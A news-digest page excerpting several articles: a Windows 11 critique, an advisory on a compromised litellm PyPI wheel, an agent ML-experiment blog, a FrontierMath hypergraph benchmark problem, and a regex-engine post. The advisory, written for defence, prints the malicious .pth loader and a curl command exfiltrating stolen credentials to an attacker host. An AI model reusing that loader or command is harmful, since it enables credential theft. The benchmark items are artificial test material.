10 interesting stories served every morning and every evening.
Microsoft just announced a 7-point plan to fix Windows 11, and the tech press is treating it like a redemption arc. Pavan Davuluri, the Windows president, admitted in January 2026 that “Windows 11 had gone off track” and said Microsoft was entering a mode called “swarming” where engineers would be pulled off new features to fix existing problems.
I saw this headline and my first thought was: it’s like being in an abusive relationship. They beat you, then show up with flowers saying they’ve changed. And everyone around you says “see, they’re getting better.” But the bruises are still there and the apology only covers the hits people noticed.
I want to walk through what Microsoft actually did to Windows 11 over the past four years, because this “fix” announcement only makes sense when you see the full damage list and realize that the worst offenses aren’t even part of the repair plan.
The Copilot invasion started September 26, 2023, when Microsoft pushed their AI chatbot into Windows 11 ahead of the formal 23H2 release. The icon appeared between your Start menu and system tray, you couldn’t move it, you couldn’t remove it through normal settings, and it hijacked the Win+C keyboard shortcut. Over the next two years, Copilot buttons metastasized into Snipping Tool, Photos, Notepad, Widgets, File Explorer context menus, Start menu search, and system Settings. Microsoft even planned to force-install the Microsoft 365 Copilot app directly onto Start menus of “eligible PCs.” The new plan promises to remove all of that. They want credit for pulling their hand out of your pocket.
On April 24, 2024, Microsoft shipped update KB5036980, which injected advertisements into the Windows 11 Start menu’s “Recommended” section. These showed up labeled “Promoted” and pushed apps like Opera browser and some password manager nobody asked for. And the Start menu was just one surface: they also placed ads on the lock screen, in the Settings homepage hawking Game Pass subscriptions, inside File Explorer pushing OneDrive, and through “tip” notifications that were thinly veiled product pitches. The “fix” promises “fewer ads.” Fewer. The operating system you paid $139 for at retail should have exactly zero ads, and the fact that “fewer” is supposed to impress anyone shows how thoroughly Microsoft has lowered the bar.
The privacy angle is where this gets dangerous. When Windows 11 launched in October 2021, Home edition required a Microsoft account during setup. By October 2025, Microsoft had systematically hunted down and killed every single workaround for creating a local account, the `oobe\bypassnro` command, the BypassNRO registry toggle, the `ms-cxh:localonly` trick, even the old fake email method. Amanda Langowski from Microsoft stated it plainly: they were “removing known mechanisms for creating a local account in the Windows Setup experience.”
A Microsoft account means your identity is tied to your OS from first boot. Your activity, your app usage, your browsing through Edge, your files through OneDrive, all funneled into a profile Microsoft controls. And this particular abuse is nowhere in the 7-point fix plan.
OneDrive got the same treatment. Microsoft silently changed Windows 11 setup in 2024 so that OneDrive folder backup enables automatically with no consent dialog, syncing your Desktop, Documents, Pictures, Music, and Videos to Microsoft’s cloud. When people discovered this and tried to turn it off, their files disappeared from their local machine because OneDrive had moved them, transferring ownership of personal files to Microsoft’s cloud service without asking. Author Jason Pargin went viral describing how OneDrive activated itself, moved his files, then started deleting them when he hit the free 5GB storage limit. Microsoft’s response to this was silence. Also not in the fix plan.
Windows Recall is worth lingering on. Announced May 2024, it’s an AI feature that screenshots everything on your screen every few seconds and makes it searchable. Security researcher Kevin Beaumont demonstrated that the entire Recall database was stored in plaintext in an AppData folder where any malware could extract it. Bank numbers, Social Security numbers, passwords, all sitting in an unencrypted SQLite database.
The UK’s Information Commissioner’s Office got involved. Microsoft delayed it, made it opt-in, added encryption, and quietly relaunched it for Insiders in November 2024. They built a surveillance feature, shipped it broken, got caught, and called the patch “responding to feedback.”
But the abuse pattern goes back way further than Windows 11. In 2015 and 2016, Microsoft ran the GWX (Get Windows 10) campaign, full-screen nag dialogs that pushed Windows 10 upgrades on Windows 7 and 8 users. In May 2016, they changed the behavior of the red X button so that clicking it, which for decades had meant “close” or “cancel”, instead scheduled the Windows 10 upgrade. Microsoft’s own security advice told users to close suspicious dialogs using the X button, and they weaponized that trained behavior against their own customers. A woman named Teri Goldstein sued after the forced upgrade bricked her travel agency PC and won $10,000. Microsoft appealed, then dropped the appeal and paid. They eventually admitted they “went too far.”
And right now, Microsoft is about to force 240 million PCs into the landfill. Windows 10 hit end of life on October 14, 2025, and Windows 11 requires TPM 2.0, specific CPU generations, UEFI Secure Boot, hardware requirements that excluded roughly 20% of all PCs worldwide. Perfectly functional machines, rendered “obsolete” by arbitrary software restrictions. If you want to keep getting security patches on Windows 10, Microsoft will charge you $30 per year, paying for patches to an operating system you already bought a license for. Enterprise customers pay $61 per device for Year 1, $122 for Year 2, and $244 for Year 3, with the price doubling each year.
Edge is its own disaster. Mozilla commissioned an independent report titled “Over the Edge” that documented specific dark patterns including confirmshaming (pop-ups implying you’re “shopping in a dumb way” if you don’t use Edge), disguised ads injected into Google.com and the Chrome Web Store, and default browser settings that hijack back to Edge without notification. Certain Windows web links still force-open in Edge regardless of your default browser setting. Despite all this manipulation, Edge holds just 5.35% global market share. Even with the full weight of an operating system monopoly forcing their browser on people, almost nobody chooses to use it.
And the telemetry question. On Windows 11 Home and Pro, you cannot fully disable telemetry. Setting `AllowTelemetry` to 0 in the registry on non-Enterprise editions gets silently overridden back to 1. Only Enterprise and Education editions can actually turn it off. The operating system you paid for reports data about you to Microsoft, and the setting to stop it is a lie on consumer editions. Also not in the fix plan.
I haven’t even mentioned the EU fining Microsoft over 2.2 billion euros across multiple antitrust rulings, including 561 million euros specifically for breaking a browser ballot promise (a Windows 7 update silently removed the choice screen for 14 months, affecting 15 million users; it was the first time the EU fined a company for violating a “commitment decision”). Or the _NSAKEY controversy from 1999, where a second crypto key labeled literally `_NSAKEY` was found embedded in Windows NT. Or the time in August 2024 when a Microsoft update bricked Linux dual-boot systems across Ubuntu, Mint, and other distros, and it took 9 months to fully fix.
Ok so here’s the table that tells the whole story:
The bottom four rows are the ones that matter. The privacy-hostile changes, the forced Microsoft accounts, the telemetry that lies about being disabled, OneDrive hijacking your files, the pre-installed garbage, none of that is part of the fix plan. Microsoft’s “swarming” effort targets the most visible UI annoyances, the ones that generate bad headlines. Data collection, vendor lock-in, forced accounts, those stay because those are the revenue model.
Microsoft spent four years deliberately degrading an operating system that people paid $139 or more for, and now they’re announcing the removal of their own damage as if it’s a gift. The “fix” is them taking their foot off your neck and expecting applause. The ads should have never been there, the Copilot buttons should have never been forced, and the taskbar should have never been crippled in the first place. And the things they’re choosing to keep, the telemetry, the forced accounts, the data harvesting, those are the real product, because at this point, you are.
...
Read the original on www.sambent.com »
The litellm==1.82.8 wheel package on PyPI contains a malicious .pth file (litellm_init.pth, 34,628 bytes) that automatically executes a credential-stealing script every time the Python interpreter starts — no import litellm required.
This is a supply chain compromise. The malicious file is listed in the package’s own RECORD:
pip download litellm==1.82.8 --no-deps -d /tmp/check
python3 -c "
import zipfile, os
whl = '/tmp/check/' + [f for f in os.listdir('/tmp/check') if f.endswith('.whl')][0]
with zipfile.ZipFile(whl) as z:
    pth = [n for n in z.namelist() if n.endswith('.pth')]
    print('PTH files:', pth)
    for p in pth:
        print(z.read(p)[:300])
"
You will see litellm_init.pth containing:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('…'))"])
The payload is double base64-encoded. When decoded, it performs the following:
The script collects sensitive data from the host system:
* Webhook URLs: grep for Slack/Discord webhook URLs in env and config files
The collected data is encrypted with openssl enc -aes-256-cbc -pbkdf2
The AES session key is encrypted with a hardcoded 4096-bit RSA public key via openssl pkeyutl -encrypt -pkeyopt rsa_padding_mode:oaep
Both encrypted files are packed into tpcp.tar.gz
The archive is exfiltrated via:
curl -s -o /dev/null -X POST \
  "https://models.litellm.cloud/" \
  -H "Content-Type: application/octet-stream" \
  -H "X-Filename: tpcp.tar.gz" \
  --data-binary @tpcp.tar.gz
* Trigger mechanism: .pth files in site-packages/ are executed automatically by the Python interpreter on startup (see Python docs on .pth files). No import statement is needed; a harmless demonstration follows this list.
* Stealth: The payload is double base64-encoded, making it invisible to naive source code grep.
* Exfiltration target: https://models.litellm.cloud/ — note the domain litellm.cloud (NOT litellm.ai, the official domain).
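To see the trigger mechanism in action harmlessly: site.py executes any line beginning with import in a site-packages .pth file at interpreter startup. A minimal sketch (the file name below is illustrative, and writing to site-packages may require elevated permissions):

# harmless demonstration of the .pth trigger mechanism
import site, pathlib

site_dir = pathlib.Path(site.getsitepackages()[0])
demo = site_dir / "demo_init.pth"  # illustrative name
# any line starting with "import" in a .pth file runs on every python start
demo.write_text('import sys; sys.stderr.write("pth hook ran\\n")\n')
# launching any new interpreter now executes the hook before user code:
#   $ python3 -c "pass"
#   pth hook ran
demo.unlink()  # clean up afterwards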
Anyone who installed litellm==1.82.8 via pip has had all environment variables, SSH keys, cloud credentials, and other secrets collected and sent to an attacker-controlled server.
* Other versions: Not yet checked — the attacker may have compromised multiple releases
* Users: Check for litellm_init.pth in your site-packages/ directory
* Users: Rotate ALL credentials that were present as environment variables or in config files on any system where litellm 1.82.8 was installed
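A minimal check along those lines (a sketch; in a virtualenv the site-packages path may differ):

# sketch: look for the malicious file in every site-packages directory
import site, pathlib

dirs = list(site.getsitepackages()) + [site.getusersitepackages()]
for d in dirs:
    p = pathlib.Path(d) / "litellm_init.pth"
    if p.exists():
        print(f"FOUND {p} ({p.stat().st_size} bytes) - treat this host as compromised")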
...
Read the original on github.com »
Autoresearch on an old research idea
Ever since it showed up on my GH feed, Karpathy’s Autoresearch was rattling around in the back of my mind. I wanted to try it on a research problem I fully understood. So this weekend, I picked up my old research code from eCLIP, dusted off its legacy dependencies and gave it to Claude Code. And just let it cook while I did some chores around the house.
This is my journey…
Autoresearch is a simple constrained optimization loop with an LLM agent in the middle. The agent iteratively improves some eval metric by modifying a single file (train.py), while reading instructions from program.md. I added a scratchpad.md file for the agent to use as working memory to document its thought process and experiment history.
In the program.md, I split the exploration into “phases”, starting with some obvious hyperparameter tuning, then moving on to small architectural changes and finally some moonshot ideas. In the final phase, I basically let the agent run with minimal constraints, and gave it web access to read papers and look for new ideas.
The whole thing is a tight loop: hypothesize → edit → train → evaluate → commit or revert → repeat.
The experiment should be short, around 5 minutes wall clock per run, to encourage quick iterations and prevent overfitting to noise. The agent is free to change anything in train.py as long as it runs within the time budget.
Since I was paranoid about letting the agent run arbitrary code in my workstation, I containerized the training loop and removed network access. The whole experimentation flow is orchestrated by a run.sh. Then I lock down Claude Code’s permissions to only edit these two files and run run.sh. No direct Python execution, no pip installs, no network access, no git push, etc.
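The heart of the loop is small enough to sketch. Here is my reconstruction of the commit-or-revert step (illustrative Python; the real orchestration lives in run.sh, and the metrics file name and time budget here are assumptions):

import json, subprocess

def step(best: float) -> float:
    # containerized, network-less training run with a hard wall-clock budget
    subprocess.run(["timeout", "300", "python", "train.py"], check=True)
    score = json.load(open("metrics.json"))["val_mean_rank"]  # hypothetical file
    if score < best:  # lower mean rank is better: keep the edit
        subprocess.run(["git", "commit", "-am", f"mean_rank={score:.2f}"], check=True)
        return score
    subprocess.run(["git", "checkout", "--", "train.py"], check=True)  # revert
    return best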
I won’t bore you with the details, you can check out the repo here!
The original paper used several medical X-ray datasets which I don’t have access to anymore, so I needed a new dataset with spatial annotations to test the expert attention mechanism. I picked the Ukiyo-eVG dataset: ~11K Japanese woodblock prints with phrase → bounding box annotations from the CIGAr paper (ECCV 2024 VISART).
Heatmaps obtained from bounding boxes guide the model to focus on specific regions.
The bounding boxes were converted to gaussian heatmaps and fed into the model as an additional input, similar to how radiologist eye-gaze heatmaps work in the original eCLIP paper.
I had a busy week and a lot of chores piling up, so I just pointed Claude at my old research code and went to do laundry. It upgraded the python env of my old research codebase, wrote the ingestion code for the new dataset, and wrote the scaffolding for the experiment loop.
I set up the CV splits, evaluation logic and some initial ideas for the program.md.
For the eval metric we picked Mean Rank of the retrieved embeddings. I didn’t put much thought into it — in hindsight, Median Rank would’ve been a better choice since it’s more robust to outliers. But we just needed something intuitive that clearly tells the agent whether a change is good or bad. Since Recall@K is the standard for reporting final results anyway, Mean Rank just needed to point in the right direction.
Eval: Mean Rank on a held-out test set of 1K images, with Recall@K as a sanity check.
Baseline: Val mean rank of 344.68, with img→txt R@1 of 17.2% and txt→img R@1 of 16.5%.
So how did it do?
I kicked off the loop on Saturday morning and let it run through the day, occasionally checking in to nudge the agent in the right direction. By the time I was done with groceries, the agent had already burned through a couple of dozen experiments and knocked off a huge chunk of the eval mean rank.
By the end of the day, the agent ran 42 experiments, committing 13 and reverting 29. The mean rank dropped from 344.68 to 157.43 (54% reduction).
After the agent finished its exploration, I did one final training run on the full dataset. The test scores actually came out better than the validation scores. This meant we were underfitting during the short 800-step experiment runs, leaving performance on the table.
Temperature clamp fix (−113 mean rank): It immediately went for a bug in my code. I had clamped the learnable temperature param at 2. It relaxed the limit, and boom, the eval dropped by 113 points. This was the single biggest win, worth more than all the architecture changes combined.
Optuna++ (-30 mean rank): Further gains came mostly from hyperparameter tuning. The agent acted like a hyperparameter optimization algorithm with some basic reasoning baked in. Increasing projection dimension and re-tuning the LR knocked off another 30 points. This is still tedious work that a human would do (and get minimal pleasure from), but the agent did it faster and more methodically.
Diminishing Returns: By the time we got to Phase 4 with the architectural changes, the success rate of the LLM’s hypotheses dropped significantly. The changes to the attention mechanism in the heatmap processor didn’t work out. Neither did the moonshot ideas in Phase 5. The agent was just throwing spaghetti at the wall, and most of it did not stick.
Sandbox is important: Towards the end, Claude Code sometimes forgot its permissions and started making weird bash calls, then complained and stopped looping. At one point it got tired of waiting for training to finish and just ended the conversation. I wouldn’t give it full autonomy just yet :)
Like with any LLM project, the first 90% of the work was super smooth and barely needed my intervention. The last 10% was a slog. This was a fun experiment that showed how an LLM agent can drive ML research in a structured way. When the search space is clearly defined, the commit-or-revert loop proposed in Autoresearch is a surprisingly effective search strategy. But when the agent ventured into the “unknown unknowns”, the optimization loop just exploded.
It is possible that the “make only one change per experiment” constraint was too tight for the moonshot ideas. Maybe we could have injected a planning stage into the Agent loop so it could think ahead. Or maybe deployed some subagents.
Maybe. But it was already time for dinner, and we were planning to watch a movie after that, so this was where Claude and I parted ways… until Monday of course.
Ukiyo-eVG — ~11K Japanese woodblock prints with phrase→bounding box annotations from the CIGAr paper (ECCV 2024 VISART).
Autoresearch by Andrej Karpathy for the original idea.
...
Read the original on ykumar.me »
Construct hypergraphs as large as possible that do not have a certain easy-to-check, difficult-to-find property.
Solution Update: This problem has been solved! A solution was first elicited by Kevin Barreto and Liam Price, using GPT-5.4 Pro. This solution was confirmed by problem contributor Will Brian, and will be written up for publication. A full transcript of the original conversation with GPT-5.4 Pro can be found here and GPT-5.4 Pro’s write-up from the end of that transcript can be found here.
Brian’s comments: “This is an exciting solution to a problem I find very interesting. I had previously wondered if the AI’s approach might be possible, but it seemed hard to work out. Now I see that it works out perfectly. It eliminates an inefficiency in our lower-bound construction and in some sense mirrors the intricacy of our upper-bound construction. The matching lower and upper bounds are quite good for Ramsey-theoretic problems, and I’m interested in further understanding why this works out so well.”
Brian plans to write up the solution for publication, possibly including follow-on work spurred by the AI’s ideas. Barreto and Price have the option of being coauthors on any resulting papers. We will update this page with links to future work.
Subsequent to this solve, we finished developing our general scaffold for testing models on FrontierMath: Open Problems. In this scaffold, several other models were able to solve the problem as well: Opus 4.6 (max), Gemini 3.1 Pro, and GPT-5.4 (xhigh).
Original Description: This problem is about improving lower bounds on the values of a sequence, \(H(n)\), that arises in the study of simultaneous convergence of sets of infinite series, defined as follows.
A hypergraph \((V,\mathcal H)\) is said to contain a partition of size \(n\) if there is some \(D \subseteq V\) and \(\mathcal P \subseteq \mathcal H\) such that \(|D| = n\) and every member of \(D\) is contained in exactly one member of \(\mathcal P\). \(H(n)\) is the greatest \(k \in \mathbb{N}\) such that there is a hypergraph \((V,\mathcal H)\) with \(|V| = k\) having no isolated vertices and containing no partitions of size greater than \(n\).
It is believed that the best-known lower bounds for \(H(n)\) are suboptimal, even asymptotically, and that they can be improved by finding new constructions of hypergraphs. The goal of this problem is to find such a construction.
Warm-up: we ask for a value of \(n\) where constructions are already known.
Single Challenge: we ask for a value of \(n\) for which no construction is known, and which is probably too hard to brute-force.
Full Problem: we ask for a general algorithm for all \(n\).

We have evaluated the following models on this problem. “Warm-up” refers to an easier variant of the problem with a known solution.

Warm-up: A hypergraph (V, H) is said to contain a partition of size n if there is some D ⊆ V and P ⊆ H such that |D| = n and every member of D is contained in exactly one member of P. Find a hypergraph (V, H) with no isolated vertices such that |V| ≥ 64, |H| ≤ 20, and (V, H) contains no partitions of size > 20. Output the hypergraph as a string where vertices are labeled 1, …, |V|, and edges are denoted with curly braces. Example: {1,2,3},{2,4},{3,4,5},{1,5}

Single Challenge: A hypergraph (V, H) is said to contain a partition of size n if there is some D ⊆ V and P ⊆ H such that |D| = n and every member of D is contained in exactly one member of P. Find a hypergraph (V, H) with no isolated vertices such that |V| ≥ 66, |H| ≤ 20, and (V, H) contains no partitions of size > 20. Output the hypergraph as a string where vertices are labeled 1, …, |V|, and edges are denoted with curly braces. Example: {1,2,3},{2,4},{3,4,5},{1,5}

Full Problem: A hypergraph (V, H) is said to contain a partition of size n if there is some D ⊆ V and P ⊆ H such that |D| = n and every member of D is contained in exactly one member of P. Define H(n) to be the largest integer k such that there is a hypergraph (V, H) with |V| = k having no isolated vertices and containing no partitions of size greater than n.

It is known that H(n) ≥ k_n, where k_n is defined recursively by the formula k_1 = 1 and k_n = ⌊n/2⌋ + k_⌊n/2⌋ + k_⌊(n+1)/2⌋.

Your task is to improve this lower bound by a constant factor, i.e. show that H(n) ≥ c·k_n for some c > 1. It is acceptable if this improvement does not work for small n, but it must already be “in effect” for n = 15. You must demonstrate this improvement by providing an algorithm that takes n as input and produces a hypergraph witnessing H(n) ≥ c·k_n.

Please provide an algorithm that takes n as input and outputs the witness hypergraph as a string where vertices are labeled 1, …, |V|, and edges are denoted with curly braces. Example: {1,2,3},{2,4},{3,4,5},{1,5}
Solution format:
* Write a Python script defining a function `solution(n: int) -> str`.
* Do not include any code at the file level. You may include a `main` block for testing, but it will not be executed by the verifier.
* For n ≤ 100, the algorithm must complete within 10 minutes when run on a typical laptop.

The author assessed the problem as follows:

* Number of mathematicians highly familiar with the problem: a majority of those working on a specialized topic (≈10)
* Number of mathematicians who have made a serious attempt to solve the problem:
* Rough guess of how long it would take an expert human to solve the problem:
* Whether a solution would open up new research avenues: fairly likely; the problem is rich enough that most solutions should open new avenues
* Probability that the problem is solvable as stated:
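For a sense of scale, the recurrence defining the known bound k_n is easy to compute directly (a quick sketch, not part of the official problem statement):

from functools import lru_cache

@lru_cache(maxsize=None)
def k(n: int) -> int:
    # k_1 = 1, k_n = floor(n/2) + k_floor(n/2) + k_floor((n+1)/2)
    if n == 1:
        return 1
    return n // 2 + k(n // 2) + k((n + 1) // 2)

print([k(n) for n in range(1, 11)])  # [1, 3, 5, 8, 10, 13, 16, 20, 22, 25]
# k_n grows like Theta(n log n); the problem asks for a constant-factor gain.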
...
Read the original on epoch.ai »
...
Read the original on github.com »
...
Read the original on www.answer.ai »
search a document for a pattern and it takes a second. search one a hundred times larger and it doesn’t take a hundred seconds - it can take almost three hours. every regex engine, in every language, has had this problem since the 1970s, and nobody fixed it.
every regex engine that advertises linear-time matching - RE2, Go’s regexp, rust’s regex crate, .NET’s NonBacktracking mode - means linear time for a single match. the moment you call find_iter or FindAll, that guarantee is gone. the rust regex crate docs are the only ones honest enough to say it outright:
the worst case time complexity for iterators is O(m * n²). […] if both patterns and haystacks are untrusted and you’re iterating over all matches, you’re susceptible to worst case quadratic time complexity. There is no way to avoid this. One possible way to mitigate this is to […] immediately stop as soon as a match has been found. Enabling this mode will thus restore the worst case O(m * n) time complexity bound, but at the cost of different semantics.
the mechanism is simple. take the pattern .*a|b and a haystack of n b’s. at each position, the engine tries .*a first: scan the entire remaining haystack looking for an a, find none, fail. then the b branch matches a single character. advance one position, repeat. that’s n + (n-1) + (n-2) + … = O(n²) work to report n single-character matches. a textbook triangular sum.
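you can reproduce the triangular sum in a few lines. a quick sketch in python - its re engine is backtracking rather than automata-based, but on this exact pattern and input it does the same thing: every failed .*a attempt scans the whole remaining tail.

import re, time

pattern = re.compile(r".*a|b")   # the pathological pattern from above

for n in (10_000, 20_000, 40_000):
    haystack = "b" * n
    t0 = time.perf_counter()
    matches = sum(1 for _ in pattern.finditer(haystack))
    print(f"n={n:>6}  matches={matches:>6}  {time.perf_counter() - t0:.2f}s")
# doubling the input roughly quadruples the time: n + (n-1) + ... = O(n^2)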
Russ Cox described this exact problem back in 2009, noting that even the original awk by Aho himself used the naive quadratic “loop around a DFA” for leftmost-longest matching. BurntSushi’s rebar benchmark suite confirms it empirically across RE2, Go, and rust. the throughput halves when the input doubles. as he put it: “even for automata oriented engines, it provokes a case that is unavoidably O(m * n²)”.
how did this go unnoticed for so long? almost all academic regex papers focus exclusively on the single-match problem and then handwave the rest away with “just iterate”. part of the reason is that the theory of regexes boils everything down to a single yes/no question: does this string match or not? that’s clean and great for proving theorems, but it throws away nearly everything that matters in practice: where the matches are, how long they are, and how many there are. once you reduce regexes to “match or no match”, the all-matches problem simply disappears from view, pigeonholed into a framing that has little to do with what people actually use regexes for.
backtracking is worse, and still the default
before getting into the fix, it’s worth putting the quadratic problem in context. with backtracking, a user-supplied pattern and a 50-character input can take longer than the heat death of the universe. it’s exponential. Thompson published the NFA construction that avoids it back in 1968. that’s nearly 60 years of a solved problem being actively unsolved at scale, because backtracking is still the default in most regex engines. my GitHub security alerts in march 2026 tell the story:
minimatch is npm’s own glob-matching library, written by npm’s creator. it converts globs to JavaScript regexes and has been hit by five separate ReDoS CVEs, all caused by the same root issue: backtracking. it gets 350 million downloads a week. the library’s readme now warns in bold that “if you create a system where you take user input, and use that input as the source of a Regular Expression pattern […] you will be pwned”, and states that future ReDoS reports will be considered “working as intended.”
the quadratic all-matches problem is more subtle. it affects even the engines specifically built to avoid backtracking. it won’t kill your browser, but it will still quietly turn a one-second search into a three-hour one.
Aho-Corasick solved this for fixed strings in 1975
the problem we’re talking about in this post (finding all leftmost-longest non-overlapping matches without quadratic blowup) was actually solved decades ago, but only for fixed strings. Aho-Corasick (1975) is a classic and very useful algorithm that finds all occurrences of multiple fixed strings in a single O(n) pass, and has been linear from the start. you build a trie from your set of patterns, add failure links between nodes, and scan the input once. at each character, every active candidate advances through the trie or falls back along a failure link. no quadratic blowup, no matter how many patterns or matches.
here’s the Aho-Corasick automaton for the patterns {“he”, “she”}, or at least an LLM’s best attempt at one. solid arrows are trie transitions, dashed arrows are failure links:
scanning “ushers”: u stays at root, s enters S, h enters SH, e enters SHE, match “she”. then the failure link jumps to HE, match “he”. two overlapping matches found in one pass.
the reason Aho-Corasick avoids the quadratic blowup is simple: every pattern has a known length, baked into the trie. when you find a match, you already know exactly how long it is. there’s no ambiguity about where it ends, nothing to rescan. but it only works for a list of literal strings, not regexes.
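a minimal sketch of the construction (illustrative python, not production code): build the trie, wire the failure links with a BFS, then scan the input once.

from collections import deque

def build(patterns):
    # trie as parallel arrays: goto[node][ch] -> node, failure links, outputs
    goto, fail, out = [{}], [0], [[]]
    for pat in patterns:
        node = 0
        for ch in pat:
            if ch not in goto[node]:
                goto[node][ch] = len(goto)
                goto.append({}); fail.append(0); out.append([])
            node = goto[node][ch]
        out[node].append(pat)
    q = deque(goto[0].values())          # depth-1 nodes fail to the root
    while q:
        node = q.popleft()
        for ch, nxt in goto[node].items():
            q.append(nxt)
            f = fail[node]
            while f and ch not in goto[f]:
                f = fail[f]              # fall back until ch can be followed
            fail[nxt] = goto[f].get(ch, 0)
            out[nxt] = out[nxt] + out[fail[nxt]]   # inherit matches via fail link
    return goto, fail, out

def find_all(text, goto, fail, out):
    node, matches = 0, []
    for i, ch in enumerate(text):
        while node and ch not in goto[node]:
            node = fail[node]
        node = goto[node].get(ch, 0)
        matches += [(i - len(p) + 1, p) for p in out[node]]
    return matches

print(find_all("ushers", *build(["he", "she"])))   # [(1, 'she'), (2, 'he')]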
Hyperscan (and its fork Vectorscan) is a true linear-time all-matches regex engine. it achieves this by using “earliest match” semantics: reporting a match the moment the DFA enters a match state, instead of continuing to find the longest one. this changes the results. for example, given the pattern a+ and the input aaaa:
earliest: a a a a - four matches, each as short as possible
leftmost-longest: aaaa - one match covering the whole run
for Hyperscan’s use case - network intrusion detection, where you just need to know that a pattern matched - this is the right tradeoff. but for grep, editors, and search-and-replace, where users expect a+ to match the full run of a’s, earliest semantics gives the wrong answer.
REmatch (VLDB 2023) takes yet another approach: it enumerates every valid (start, end) span for a pattern, including all overlapping and nested ones. for a+ on aaaa that’s 10 spans: (0,1), (0,2), …, (2,4), (3,4). the output itself can be O(n²), so it’s solving a different problem.
two passes instead of n
the reason i’m writing about this at all is that i’ve been working on RE#, and i want to show that this problem is actually possible to solve. to the best of my knowledge, RE# is the first regex engine that can find all matches in two passes, regardless of the pattern or the input, without altering the semantics.
the algorithm doesn’t find matches one at a time. instead it does two passes over the entire input: a reverse DFA marks where matches could start, then a forward DFA resolves the longest match at each marked position. by the time we confirm a match, both directions have already been scanned. matches are reported retroactively rather than by restarting from each position. the llmatch algorithm section in the first post walks through this in detail.
one match or ten thousand, it’s the same two passes - same .*a|b example as before.
on patterns that produce many matches - log parsing, data extraction, search-and-replace across large files - the difference between O(n) and O(n²) is the difference between “instant” and “why is this taking so long”.
the matches are still leftmost-longest (POSIX) - a|ab and ab|a give the same results, boolean algebra works, and you can refactor patterns without changing the output.
two passes eliminate the n restarts, but the forward pass itself still resolves one match at a time. pathological patterns with ambiguous match boundaries can cause quadratic work within that pass. i wanted a mode that guarantees linear time even on adversarial input, no exceptions. so i added a hardened mode to the engine.
hardened mode replaces the forward pass with an O(n * S) scan (where S is the number of simultaneously active DFA states) that resolves all match endings in a single pass, returning exactly the same leftmost-longest matches with no semantic tradeoff. on pathological input (.*a|b against a haystack of b’s), the difference is dramatic:
normal mode goes quadratic; hardened stays linear. so why not make hardened the default? i went back and forth on this.
the quadratic blowup requires a pathological pattern and a structured input that’s long enough to cause a problem. you need both halves. take a pattern like [A-Z][a-z]+: every match starts at an uppercase letter and ends the moment the engine sees something that isn’t lowercase. there’s no ambiguity about where a match ends, so the engine never rescans the same input. for this pattern, the quadratic case is actually impossible. most real-world patterns share this property.
so imposing a 3-20x constant-factor slowdown on every query to protect against a case you’re unlikely to hit by accident felt wrong.
but if patterns are user-supplied, none of that holds. the attacker controls one half of the equation and the compile time as well. “you probably won’t hit it” is exactly the kind of reasoning that leads to production incidents. in the end i kept the fast path as the default, mostly because the slowdown is real and measurable on every single query, while the pathological case requires a genuinely hostile combination.
there’s also a practical reality: i’m trying to show that RE# is the fastest regex engine for common workloads. if the default path is 20% slower on common benchmarks, that’s what people see, not the quadratic fix. i won’t have it.
hardened mode is there for when you’re accepting patterns from the internet and can’t trust what you’re getting - an explicit opt-in rather than a silent tax on everyone.
patterns with lookarounds are currently rejected in hardened mode. there’s no theoretical barrier, but the implementation needs some work.
RE#’s hardened mode extends Aho-Corasick’s approach to full regexes, where match lengths aren’t known in advance. instead of a trie it holds a set of active match candidates, advancing all of them on each input character using derivatives. new candidates are only added at positions already confirmed as valid match beginnings by the reverse pass, so the engine never wastes work on positions that can’t start a match. the result is the same property Aho-Corasick has always had, linear-time all-matches, but for regexes.
so how does RE#’s normal mode compare to Aho-Corasick on its home turf? here’s a benchmark with a dictionary of 2663 words as a word1|word2|…|wordN alternation, matched against ~900KB of english prose - exactly the kind of workload Aho-Corasick was designed for. RE# just compiles it as a regular regex:
how is this possible when RE# is doing more work - two passes instead of one? it comes down to cache behavior. Aho-Corasick builds the full automaton upfront - for 2663 words that’s a large DFA with many states and unpredictable jumps between them, leading to cache misses and branch mispredictions. rust regex uses a single lazily-compiled DFA, which helps, but the state space for a large alternation is still substantial. RE#’s derivative-based DFAs are lazily built and more compact - the two automata (forward and reverse) each have far fewer states than the equivalent full trie or NFA-based DFA, so transitions hit warm cache lines more often.
RE# hardened is doing unnecessary work here - as with [A-Z][a-z]+ above, this pattern has unambiguous match boundaries, so hardening adds nothing. this loss isn’t inevitable. we can infer at compile time that hardening isn’t needed for patterns like these, but there are higher priorities right now.
to be clear, for a smaller set of strings and a fully built automaton that fits comfortably in L1 cache, Aho-Corasick would be the right choice - it only needs one pass while RE# scans twice. the result above is specific to large patterns where cache pressure matters.
speaking of higher priorities - in the previous post i described how skip acceleration works and where RE# was losing to regex on literal-heavy patterns. since then i’ve been closing those gaps with hand-written AVX2 and NEON implementations - rare byte search, teddy multi-position matching, and range-based character class scanning.
these used to be significant losses. closing them was one of the more satisfying things to get working. i was also eager to see how RE# performs on rebar, BurntSushi’s benchmark suite for regex engines:
RE# does very well here now - most numbers are within noise threshold of regex. the few differences here and there come down to byte frequency tables and algorithmic choices in the skip loop. for context, a DFA by itself gets you somewhere near 1 GB/s. CPU vector intrinsics can opportunistically push that to 40+ on patterns where most of the input can be skipped.
since RE# matches in reverse, you might be wondering whether it can work on streams:
any pattern + leftmost-longest semantics = no. this isn’t an engine limitation - it’s inherent to the semantics. if you ask for the longest match on an infinite stream, the answer might be “keep going forever.” you might think leftmost-greedy avoids this since it works left-to-right, but it doesn’t - .*a|b on a stream of b’s has the same problem, the .*a branch keeps scanning forward looking for the last a that may never come.
pattern with an unambiguous end boundary = yes. some patterns already have unambiguous boundaries and work fine as-is. for the ones that don’t, in RE# you can intersect with a boundary - ^.*$ for lines, ~(_*\n\n_*) for paragraphs (where ~(…) is complement and _* matches any string), or any delimiter you want - and now the pattern is compatible with streaming. in the previous post i showed how you can intersect a regex with “valid utf-8”, here, you can intersect with “up to the next newline” or “up to the end of the section”, even if the original pattern is user-supplied and does not have this property. it is a nice and general technique.
any pattern + earliest semantics = yes. report a match the moment the DFA enters a match state, no need to scan further. this is what Hyperscan does - it works on streams because it never needs to look ahead.
the API doesn’t expose a streaming interface yet - find_all takes &[u8] - but chunked streaming is on the list.
worth being upfront about the limitations:
